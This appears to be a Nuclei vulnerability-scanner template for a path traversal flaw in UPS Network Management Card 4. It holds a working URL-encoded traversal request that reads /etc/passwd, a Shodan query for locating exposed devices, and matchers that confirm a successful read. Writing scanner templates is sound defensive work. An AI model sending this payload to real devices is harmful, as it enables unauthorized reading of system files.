id: ups-network-lfi info: name: UPS Network Management Card 4 Path Traversal author: Kazgangap severity: high description: | UPS Network Management Card version 4 suffers from a path traversal vulnerability. reference: - https://packetstormsecurity.com/files/177626/upsnmc4-traversal.txt - https://www.exploit-db.com/exploits/51897 metadata: verified: true max-request: 1 shodan-query: html:"UPS Network Management Card 4" tags: packetstorm,ups,lfi http: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: word part: header words: - "application/octet-stream" - type: status status: - 200 # digest: 4a0a004730450220030ad51cd46365526c86d1c114c09d25c8b25e75e4cb8974540a86137d618aa9022100f81c523e69c96d236741b7d852b8ae9b1de9b44cfed01e2e7b7202473e13034e:922c64590222798bb761d5b6d8e72950